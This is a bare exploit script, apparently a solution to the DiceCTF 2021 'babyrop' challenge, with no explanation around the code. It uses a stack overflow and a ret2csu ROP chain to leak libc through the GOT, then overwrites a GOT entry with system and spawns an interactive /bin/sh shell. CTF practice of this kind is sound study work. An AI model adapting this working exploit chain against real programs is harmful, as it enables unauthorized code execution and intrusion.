[DiceCTF 2021] babyrop

# exploit.py
from pwn import *
#context.log_level = 'debug'

p = process("./babyrop")
#p = remote("dicec.tf", 31924)
e = ELF("./babyrop")

setcsu = 0x4011ca
csu = 0x4011b0

def chaining(func, p1, p2, p3):
    ret = p64(0)
    ret += p64(1)
    ret += p64(p1)
    ret += p64(p2)
    ret += p64(p3)
    ret += p64(func)
    ret += p64(csu)
    ret += p64(0)
    return ret

payload = b'A'*0x48
payload += p64(setcsu)
payload += chaining(e.got['write'], 1, e.got['write'], 8)
payload += chaining(e.got['gets'], e.got['gets']+0x10, 0, 0)
payload += chaining(e.got['gets'], e.got['write'], 0, 0)
payload += chaining(e.got['write'], e.got['gets']+0x10, 0, 0)
p.sendline(payload)

write_addr = u64(p.recvuntil("\x7f")[-6:].ljust(8, b'\x00'))
log.info("write_addr = 0x%x" % write_addr)
libc_base = write_addr - 0x1111d0
log.info("libc base = 0x%x" % libc_base)

system_addr = libc_base + 0x0e62f0

p.sendline("/bin/sh\x00")
p.sendline(p64(system_addr))

p.interactive()

 

RTC